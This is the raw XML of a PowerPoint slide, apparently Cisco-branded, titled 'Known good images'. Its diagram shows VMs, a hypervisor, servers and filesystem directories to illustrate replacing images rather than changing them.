                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Right Arrow 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F878D7DD-913E-BF44-BF50-ADB89F779302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="288994" y="1960726"/>
            <a:ext cx="1683692" cy="1055461"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514325"/>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>Config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514325"/>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1925790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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7134D7-3D8F-174D-AE56-7A01959C389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386728" y="2724806"/>
            <a:ext cx="994550" cy="308025"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM One</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AA6220-359E-E743-8FD8-C3A0A56996E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640538" y="3908425"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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400">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER ONE</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5BD2EF-5CBB-EB4D-A153-8BB8D8EA6C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1640540" y="3360388"/>
            <a:ext cx="2166965" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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400">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>HYPERVISOR</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA54E651-7262-CF41-94F3-2FE11457EEE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000926" y="4279456"/>
            <a:ext cx="1414533" cy="487490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>LOCATION B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774FA1B5-2BA1-DB45-94AB-500D17F946B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316650" y="136418"/>
            <a:ext cx="5764376" cy="319204"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Known good images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4495559-9397-6F4C-B152-0E49CF0F1DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316651" y="476917"/>
            <a:ext cx="7648931" cy="314882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>          Things don’t change. New versions replace them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC0FE47-7E58-CC42-A0B8-FE1C4F7FEE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130236" y="1813788"/>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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/usr</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05A279D-311A-6741-B129-FDC0EEB1DCEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542889" y="2269297"/>
            <a:ext cx="682226"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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F143D4-DC54-6141-83AD-C25A426ACE65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657555" y="1813788"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E56BA5E-AA30-814B-AF28-374DA76F382D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181965" y="1813788"/>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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Elbow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CD5F76-29DA-5544-89C1-2BB878F6963D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2604015" y="3788419"/>
            <a:ext cx="240012" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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28D76356-BB7F-3D4B-879D-53E622E471B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1640234" y="2276599"/>
            <a:ext cx="327557" cy="1840020"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="222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48A8DE59-F5C9-5646-908E-245F7FDAC728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="0"/>
            <a:endCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="811678" y="2652482"/>
            <a:ext cx="144648" cy="1"/>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440BB330-C5D5-D848-BE10-E19C7C0FB869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="16" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="546713" y="1932007"/>
            <a:ext cx="144647" cy="529933"/>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69FF63E1-6101-E543-AA52-CBD61128AC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="810373" y="2195667"/>
            <a:ext cx="144647" cy="2614"/>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72FA12C1-A43B-BE4D-831A-19DC303E15EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1072577" y="1936075"/>
            <a:ext cx="144647" cy="521796"/>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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06360BF-AA33-E446-9982-FD10C52265D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4221448" y="2686900"/>
            <a:ext cx="994550" cy="308025"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>VM Image</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD9851F-E223-D849-A7E7-E1BC378D05BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964957" y="1775881"/>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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A11FA26-1506-834C-AC1E-E95695B676A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4377610" y="2231389"/>
            <a:ext cx="682226"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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
